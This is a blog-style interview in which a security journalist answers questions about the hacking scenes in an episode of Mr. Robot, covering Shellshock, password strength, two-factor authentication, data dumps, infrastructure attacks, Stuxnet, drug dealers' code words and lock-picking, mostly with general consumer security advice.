Another week, another Mr. Robot episode! Last Wednesday the second episode of Mr. Robot aired (Ones and Zer0s). This episode did not disappoint! It was dark, gloomy, but also included lots of technical things that made us once again question: How can this affect me?
This week I sat down with freelance security and privacy journalist, Seth Rosenblatt, to discuss the episode.
At the beginning of the show, Elliot has a bit of an involuntary meeting with E-Corp now interim CTO, Tyrell Wellick. After this meeting, Elliot goes home and hacks Tyrell. What he notices is that E-Corp mail servers haven’t been patched since “Shellshock” and that Tyrell does not use two-factor authentication nor does he have a complex password. Elliot realizes that this was all too easy and that Tyrell must have wanted Elliot to hack him. He then goes nuts and burns his chips and SIM cards in the microwave, tears apart his hard drive, destroys his mother board.
Stefanie: Lots of interesting stuff happened in this scene! Can someone hack me like Elliot hacked Tyrell? What is the Shellshock vulnerability and can it still affect me as a personal user?
Seth: If Tyrell wanted Elliot to hack him, he made it pretty easy for an experienced hacker like Elliot. I bet many people, who do not put a lot of thought and effort into their online security, can be easily hacked. The fact that E-Corp hadn’t patched their servers since Shellshock seemed a bit odd, but again this was maybe intentional to make it easy for Elliot to hack, in the hopes of blackmailing him later on. In terms of the average user, Shellshock is a vulnerability that affects systems using BASH (a Unix based command processor used by Unix- based systems such as Linux and Mac). Patches for Shellshock have long been issued, so if you update your operating system regularly you have nothing to worry about.
Stefanie: Elliot used the same “brute-force” method we talked about last week to figure out Tyrell’s password. If it’s that easy, should I use two-factor authentication in addition to having a complex password for my accounts?
Seth: In terms of using two-factor authentication, this is something that is not used enough in my opinion! It may be more work to log into accounts, but it makes your accounts more secure. Popular sites like Facebook, Twitter, and Google all offer two-factor authentication and if you don’t already use it, do it now! Of course, you should use a complex password for every account you have, because as we learned in the first episode, Elliot is able to hack a lot people due to their weak passwords.
Stefanie: Did Elliot really have to physically destroy everything?
Seth: Elliot physically destroyed his entire computer because he was afraid Tyrell would be able to use his hack as evidence and blackmail. This was a bit extreme, but in this case he could have just destroyed his hard drive and theoretically some of the memories on the motherboard. Again, unless you are afraid someone may physically come after you, it is not necessary to physically destroy things.
Later on in the episode Elliot’s boss, Gideon, asks Elliot if he knew about the DAT file found during the E-Corp hack. Elliot tells Gideon he thought it was a junk file.Mr. Robot’s fsociety releases an anonymous-style video threatening E-Corp with “data dumps” to the media from the terrabytes worth of company employee emails and files they’ve stolen, if their laundry-list of demands is not met.
Stefanie: What is a DAT file and why would Elliot think it is a junk file?
Seth: A DAT file is just a data file. Unlike .PDF or .DOC files, DAT files do not specify which program should open it, so you would need to know which program the DAT file was created for. DAT files are mostly sent as email attachments.
Stefanie: The Sony Pictures hack last November included data dumps. How serious a threat is that to a company?
Seth: It can be devastating. With the Sony hack, we saw a continuous flow of sensitive corporate data, personnel records including salary details, as well embarrassing correspondence between senior executives leaked to the press. Who knows what nefarious things a company like “Evil” Corp has in their files. Mr. Robot would hit ‘em where it hurts.
Around the 22:41 point, Mr. Robot asks Elliot to use his Allsafe company security clearance to hack the Comet P.L.C. to increase the pressure of the gas-lines nearby in order to blow-up “Steel Mountain” a natural gas refinery near a data-storage facility used by major corporations.
Stefanie: Can even an above average “hacker” like Elliott access municipal utilities and gain access to dangerous and highly controlled industrial processes like ones regulating the valves for gas lines?
Seth: Unfortunately, the answer is yes. On the whole, it has been proven that industrial infrastructure remains woefully vulnerable to computer attacks that could have devastating consequences. Our nations’ energy grid is continually under attack – in fact, in 2014, there were 79 incidents investigated by Homeland Security. Russian hackers have already infiltrated software that controls electrical turbines in the U.S., and in the case of one major U.S. energy provider, spyware sat on their computers for a year. It got there by one employee clicking on a bad link in an email.
When explaining how the gas plant will go kablooey, Mr. Robot says that when they blow up the pipeline, then Darlene’s worm will kick into gear at the data center and the “Dark Army” will take care of redundant back-ups at the Chinese facility.
Stefanie:We’ve heard of worms like Stuxnet, is that the kind of thing you think fsociety is planning to use? And who could the Dark Army be?
Seth: Stuxnet was developed to infiltrate software and remotely shut down Iran’s uranium enrichment facilities, so it is reasonable to assume that fsociety will deploy a similar worm. It was the first known malware with the ability to cause physical damage to electrical or mechanical devices, and data centers with gaps between IT and facilities systems could be vulnerable.
As for the Dark Army, we don’t know whom Mr. Robot is talking about, but there does exist mercenary hackers for hire. They sell their skills to nation-states or militant groups and do a good job of covering their tracks before going on to the next customer.
In minute 27:59 Elliot hacks into the account of his drug dealer, Fernando Vera. His password is eatdick6969. Elliot discovers that Fernando does all his drug transactions through email, chat messages, and Twitter. Digging deeper, Elliot also learns that Vera uses code-words in his tweets, that are timed with recent news articles. Words such as “Biscuit” and “Clickety” are clearly references to guns and gun sales. “Food”, “Seashells” and “gas” are codes he uses for bullets.
Stefanie: Drug-dealers have used code-words for drugs since phone calls were invented. Why is this significant? Is this news headline code-wording a pattern used in underground organizations? Have there been recent examples?
Seth: As criminal investigations today can include checking a suspect’s emails, instant messages, and Twitter history, drug dealers need to find a way of getting around these investigations and blur messages so investigations get harder and their communications history cannot be used as proof against them. The news headline code-wording pattern helps to constantly have new code words, which makes it harder for the police to understand the message behind the code. Just last fall, in the U.S. a drug trafficking ring was disrupted that spoke about “Hurricane Sandy” when speaking about one of their drugs.
What’s surprising though is that Fernando uses his personal accounts and public Twitter messages in order to do his drug dealing business. Drug dealers often use pre-paid phones for their “business” that don’t have an account and therefore the owner cannot be identified. Also, they frequently dispose of the phones and get new ones to obfuscate their activities and whereabouts.
In minute 32:14, Elliot picks the bathroom lock. He explains that “the lock-pick is every hacker’s favorite sport. Unlike virtual systems, when you break it you can feel it.”
Stefanie: When I saw this scene, this sounded familiar to me – last year I had the pleasure to meet Kevin Mitnick, once the most-wanted hacker of the United States, hunted by the FBI. Today, he is a reputable security consultant – the hacks he does today have the purpose of finding security issues in order to fix them. When I met him, he handed me his business card – and it was in the form of lock picks.
Seth: Absolutely, this is not just a cliché, hackers like to hack – not just in the digital sense, but also in the real world!